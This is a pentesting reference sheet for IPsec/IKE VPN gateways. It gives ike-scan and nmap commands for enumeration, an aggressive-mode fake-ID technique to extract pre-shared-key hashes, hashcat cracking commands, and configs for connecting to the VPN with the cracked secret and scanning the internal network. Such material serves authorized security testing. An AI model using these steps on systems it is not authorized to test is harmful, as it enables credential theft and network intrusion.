# Pentesting IPsec/IKE **Ports:** UDP 500 (IKE), UDP 4500 (NAT-T IKE) IPsec VPNs use Internet Key Exchange (IKE) for establishing secure tunnels. Misconfigurations can leak PSK hashes. *** ## Discovery ```bash # UDP scan for IKE nmap -sU -p 500,4500 $ip # Service version nmap -sU -p 500 -sV $ip ``` *** ## ike-scan Primary tool for IKE enumeration and attacks. ```bash # Install sudo apt install ike-scan ``` ### Basic Enumeration ```bash # Check if IKE is running (Main Mode) ike-scan -M $ip ``` **Output interpretation:** | Result | Meaning | | ----------------------------------------- | --------------------------------------------- | | `1 returned handshake; 0 returned notify` | Target is IPsec gateway, willing to negotiate | | `0 returned handshake; 1 returned notify` | None of proposed transforms acceptable | | `0 returned handshake; 0 returned notify` | Not an IPsec gateway | ### Vendor Identification ```bash # Fingerprint vendor via backoff timing ike-scan -M --showbackoff $ip ``` *** ## Aggressive Mode Attack (PSK Extraction) Aggressive mode is vulnerable - it returns a hash that can be cracked offline. ```bash # Aggressive mode with fake ID (extracts hash if server responds) ike-scan -P -M -A -n fakeID $ip ``` **Key output to look for:** * `ID(Type=ID_USER_FQDN, Value=...)` - reveals server's group name/ID * `Hash(20 bytes)` - the PSK hash for cracking ### Full PSK Hash Extraction ```bash ike-scan -P -M -A -n fakeID $ip ``` The output contains IKE PSK parameters in this format: ``` g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r ``` Save the entire parameter string to a file for cracking. ### Note on Fake Hashes > If a hash is returned even with a fake ID, the server may be sending fake hashes for any ID (security feature). However, if it cracks successfully, the hash was real. *** ## Cracking IKE-PSK Hash ```bash # Identify hash type hashcat --identify hash.txt # Output: 5400 | IKE-PSK SHA1 # Crack with rockyou hashcat -a 0 -m 5400 hash.txt /usr/share/wordlists/rockyou.txt # MD5 variant hashcat -a 0 -m 5300 hash.txt /usr/share/wordlists/rockyou.txt ``` ### Hashcat IKE Modes | Mode | Description | | ---- | ------------ | | 5300 | IKE-PSK MD5 | | 5400 | IKE-PSK SHA1 | *** ## Transform Enumeration If default transforms fail, enumerate acceptable ones: ```bash # Try different encryption/hash combos ike-scan -M --trans=5,2,1,2 $ip # 3DES, SHA1, MODP1024, PSK ike-scan -M --trans=7,2,1,2 $ip # AES-128, SHA1, MODP1024, PSK ike-scan -M --trans=7/256,2,1,2 $ip # AES-256 ``` ### Transform Format `--trans=enc,hash,auth,group` | Encryption | Hash | Auth | Group | | ---------- | -------- | ------------- | ------------ | | 5 = 3DES | 1 = MD5 | 1 = PSK | 1 = MODP768 | | 7 = AES | 2 = SHA1 | 2 = RSA | 2 = MODP1024 | | | | 64221 = XAUTH | 5 = MODP1536 | *** ## Connecting to VPN Once you have credentials: ### StrongSwan ```bash # Install sudo apt install strongswan # Config files /etc/ipsec.conf /etc/ipsec.secrets ``` Example `/etc/ipsec.secrets`: ``` %any : PSK "cracked_password_here" ``` ### vpnc ```bash sudo apt install vpnc # Create config sudo vim /etc/vpnc/vpn.conf ``` Example config: ``` IPSec gateway TARGET_IP IPSec ID group_name IPSec secret cracked_psk Xauth username username_here Xauth password password_here ``` Connect: ```bash sudo vpnc /etc/vpnc/vpn.conf ``` *** ## Post-Connection After VPN connection: ```bash # Check new interface ip addr # Re-scan internal network nmap -sC -sV TARGET_INTERNAL_IP ``` *** ## References * * ike-scan documentation